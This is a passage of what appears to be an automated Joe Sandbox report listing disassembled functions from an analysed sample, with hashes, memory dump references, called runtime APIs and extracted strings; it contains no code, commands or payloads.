                                        • Opcode Fuzzy Hash: e7cfce1c0d0b2e6765443c67114fc8dbc29c1e00c1e070038aa946d8ba5488e3
                                        • Instruction Fuzzy Hash: 9D41A332B09B4281EE649F25E6403B82364FB54BA4F189631EA3D57BD6DE3CD4D6C350
                                        Function 00007FF65E1F2670 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 152COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task
                                        • String ID:
                                        • API String ID: 118556049-3916222277
                                        • Opcode ID: ef240bb9e472c72bf3f8a87a7252f93db726828450f28ef30e14e3b6c24eb53b
                                        • Instruction ID: 468a0e8263e0c9f5e97e3019848fed4d1ce737492ce82509bcfa4aac2d485fb2
                                        • Opcode Fuzzy Hash: ef240bb9e472c72bf3f8a87a7252f93db726828450f28ef30e14e3b6c24eb53b
                                        • Instruction Fuzzy Hash: 31517F72A08B4596EF258F2AD65026C37A0FB58B90F584635EF6D977A0CF3CE4A1C350
                                        Function 00007FF65E1FF9F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: __current_exception__current_exception_contextterminate
                                        • String ID: csm
                                        • API String ID: 2542180945-1018135373
                                        • Opcode ID: 9a71d54b323909634587fecb3b0b832e45101661dec1fdc02d4fe101acb10c47
                                        • Instruction ID: 3b460932bd00ecef3e657bf424209f0d1b86f8b532ebecccccf65cc2ae798f6e
                                        • Opcode Fuzzy Hash: 9a71d54b323909634587fecb3b0b832e45101661dec1fdc02d4fe101acb10c47
                                        • Instruction Fuzzy Hash: EAF0F937605B95CACF649F21E8811AC3364FB5CB98B4D6131FA4D97755CF38D8908360
                                        Function 00007FF65E1F5E40 Relevance: 6.4, APIs: 5, Instructions: 130COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: memmovememset
                                        • String ID:
                                        • API String ID: 1288253900-0
                                        • Opcode ID: a361461ebd74b817559f1ba7322bb17d22a5080eb4e1f2fdce319b824f189eee
                                        • Instruction ID: bfb6f637c7103da62fee516de014c3be35d38454e937edc248685e5a3c59dac6
                                        • Opcode Fuzzy Hash: a361461ebd74b817559f1ba7322bb17d22a5080eb4e1f2fdce319b824f189eee
                                        • Instruction Fuzzy Hash: A2412C26B297D193DF24CB28C2812AD6755FB51780F488031E7ADA7B86DF3DD915C350
                                        Function 00007FF65E1F30A0 Relevance: 6.1, APIs: 4, Instructions: 114COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                        • String ID:
                                        • API String ID: 2075926362-0
                                        • Opcode ID: e2144259be0b6505c386b59d3feed13163a1020fd9c41315a436067efdf29a82
                                        • Instruction ID: 20cd12461cda21a70acf50038538f3822729333daeee687ee2dcd66fd8fc8e5d
                                        • Opcode Fuzzy Hash: e2144259be0b6505c386b59d3feed13163a1020fd9c41315a436067efdf29a82
                                        • Instruction Fuzzy Hash: 6C31E562B09B8284FE259B55A7003B92255AB14FE4F5C0631EE3DA77C6DE7DE4C1C3A0
                                        Function 00007FF65E1F35A0 Relevance: 6.1, APIs: 4, Instructions: 111COMMON
                                        Download Yara Rule
                                        APIs
                                        • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,00007FF65E1F14B3), ref: 00007FF65E1F3682
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00007FF65E1F14B3), ref: 00007FF65E1F36C0
                                        • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,00007FF65E1F14B3), ref: 00007FF65E1F36CA
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF65E1F36FF
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                        • String ID:
                                        • API String ID: 2016347663-0
                                        • Opcode ID: 17b1863025fad19d1496731260b1b962d051594f66a05eb6238705a58c684df4
                                        • Instruction ID: a92f4805ff7feb2fb862dc14b5f85bb6f452efe33e083d109f02bf3adf7f1832
                                        • Opcode Fuzzy Hash: 17b1863025fad19d1496731260b1b962d051594f66a05eb6238705a58c684df4
                                        • Instruction Fuzzy Hash: 69310671B0978185EE209F25A60436C6355AB24BE4F5C0631EE7D9BBD6DE7CE1418360
                                        Function 00007FF65E1FC990 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                        Download Yara Rule
                                        APIs
                                        • memmove.VCRUNTIME140(00000131,00000000,?,00007FF65E1F577C,?,?,?,?,?,?,?,?,?,?,?,00000131), ref: 00007FF65E1FC9FD
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: memmove
                                        • String ID:
                                        • API String ID: 2162964266-0
                                        • Opcode ID: 22c5a87cf1eb821d3e1b326642f832fd49eba514ca20bfb2045cdbb9c517b22d
                                        • Instruction ID: 1449a37bb1bc89205afdf56820e8d9b8fd8dc1f180a7b12c2114bc74c14521a7
                                        • Opcode Fuzzy Hash: 22c5a87cf1eb821d3e1b326642f832fd49eba514ca20bfb2045cdbb9c517b22d
                                        • Instruction Fuzzy Hash: 7F31E723B1578185FE259B65A6403B82144AF24BF4F2C0231EE7C677D2EE3CA4D393A4
                                        Function 00007FF65E1FB6A0 Relevance: 6.1, APIs: 4, Instructions: 100COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                        • String ID:
                                        • API String ID: 2016347663-0
                                        • Opcode ID: 423f6011978099a5633de49def7021714698bb932306e6b32f0bcf118006fb64
                                        • Instruction ID: 454770889572c1490df72c5585830030f1c8efdad07787d300588f742282bf8d
                                        • Opcode Fuzzy Hash: 423f6011978099a5633de49def7021714698bb932306e6b32f0bcf118006fb64
                                        • Instruction Fuzzy Hash: 3531D461F0974185EE309B1197043B96356EB14BE0F5C4731EA7D9BBD9DE3CE04183A0
                                        Function 00007FF65E1F34A0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: memmove$Concurrency::cancel_current_task
                                        • String ID:
                                        • API String ID: 1247048853-0
                                        • Opcode ID: 0856d8ef28bf0b974e58a5cbe811db801bf981de1f50d7aebe3243824524e5ab
                                        • Instruction ID: f5f07a54cccd2d5b4b7c22e242f21bbf73bae2db839e62a737f04b2249b8ddb9
                                        • Opcode Fuzzy Hash: 0856d8ef28bf0b974e58a5cbe811db801bf981de1f50d7aebe3243824524e5ab
                                        • Instruction Fuzzy Hash: BB21F9A2B0975645FE359B51A6003782244AF64BF5F1C0B30EE7DA77D2DF3CA4828360
                                        Function 00007FF65E1FE20C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                        • String ID:
                                        • API String ID: 2933794660-0
                                        • Opcode ID: a97b86fa2f70688a7d9bd2c8f00a38e5f6966c30de59eb49ea82c316ffeec9f8
                                        • Instruction ID: 6d43d416b674bed1456ca5691c1d7ad265ccc21b74b9a624b5fe8f7d79d50010
                                        • Opcode Fuzzy Hash: a97b86fa2f70688a7d9bd2c8f00a38e5f6966c30de59eb49ea82c316ffeec9f8
                                        • Instruction Fuzzy Hash: F6113022B14F018AFF00DF60E9542B833A4F729758F481E31EA6D967A8EF7CD1548340
                                        Function 00007FF65E1FA640 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 339COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00007FF65E1FCCF0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF65E1FCE9A
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,Security,System,?,?,?,00007FF65E1FAFB7), ref: 00007FF65E1FAA94
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                        • String ID: Security$System
                                        • API String ID: 73155330-2661570791
                                        • Opcode ID: 50d799d0bf03d6ab0226f341a1398c31d653080fcac9ab1f781c5d39ff046ff4
                                        • Instruction ID: 211c1d34b547d944f82fedf67f810514d18c866ed9c6492fb2498475f5df9594
                                        • Opcode Fuzzy Hash: 50d799d0bf03d6ab0226f341a1398c31d653080fcac9ab1f781c5d39ff046ff4
                                        • Instruction Fuzzy Hash: 6EE17062E04A8184EF218B25D6502BC27A1FB64B98F4C8136EF6D67799DF7CD494C3A0
                                        Function 00007FF65E1FCCF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task
                                        • String ID: System
                                        • API String ID: 118556049-3470857405
                                        • Opcode ID: 57678324b38aa7e480f2cd16bb7a8dde75a9da3e65f6b744abac7cf6ebda5980
                                        • Instruction ID: 1c33468e8468b14bb920a35cd8395b5652d5232546caa3f8119a0008dad5b2e7
                                        • Opcode Fuzzy Hash: 57678324b38aa7e480f2cd16bb7a8dde75a9da3e65f6b744abac7cf6ebda5980
                                        • Instruction Fuzzy Hash: 3B41F522B19B8581EE20CB24D2101B86B50EB68BA4F1CC731EE7E637D6DE3CE481D350
                                        Function 00007FF65E1FCB90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON
                                        Download Yara Rule
                                        APIs
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF65E1FCCE8
                                          • Part of subcall function 00007FF65E1FD9F0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF65E1F3975), ref: 00007FF65E1FDA0A
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1FCCE1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                        • String ID: Security
                                        • API String ID: 1934640635-1022211991
                                        • Opcode ID: 7af52754fcb6c03aff77bb4b83069b5f5df2d5dc748e781ff3ebe458f5971933
                                        • Instruction ID: 2cbd82130f27ecdc7545f0202fa94d734d13d14f1494ca2e81912b52c98e4f1a
                                        • Opcode Fuzzy Hash: 7af52754fcb6c03aff77bb4b83069b5f5df2d5dc748e781ff3ebe458f5971933
                                        • Instruction Fuzzy Hash: 5C31C022B1468581EE24CB69D6003B82750EB65FA0F8C4A31EE3DA77C5DE3CE481D394
                                        Function 00007FF65E1F85B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON
                                        Download Yara Rule
                                        APIs
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1F8661
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF65E1F8710
                                          • Part of subcall function 00007FF65E1FD9F0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF65E1F3975), ref: 00007FF65E1FDA0A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                        • String ID: System
                                        • API String ID: 1934640635-3470857405
                                        • Opcode ID: 1c72af7aff1db80b111292cff93d5bea67a3922ce020ff7019f13d82da7afb30
                                        • Instruction ID: 4c1e07f9c44e4f0367a708b10871a82fa7ec47152611ba894bd75d73d8a6ea88
                                        • Opcode Fuzzy Hash: 1c72af7aff1db80b111292cff93d5bea67a3922ce020ff7019f13d82da7afb30
                                        • Instruction Fuzzy Hash: 94412572619B4286EE209F11EA40269B3A4FB687D0F184231EAAD93BA5DF3CD491C350
                                        Function 00007FF65E1F9CFF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 74COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: _dsignmemset
                                        • String ID: 0$null
                                        • API String ID: 210716287-2239106201
                                        • Opcode ID: 449d20cf74046f8510eab42154efe2d25a62bb869c27897a45daba319c9707b5
                                        • Instruction ID: dbddb61b9514f961225cdb9d435f04041741e05f7c8284af02205590c5edc693
                                        • Opcode Fuzzy Hash: 449d20cf74046f8510eab42154efe2d25a62bb869c27897a45daba319c9707b5
                                        • Instruction Fuzzy Hash: 7F31A222618BC585DB619F29E1403EAB360FF94B84F489222EB8D53755EF3CE585C710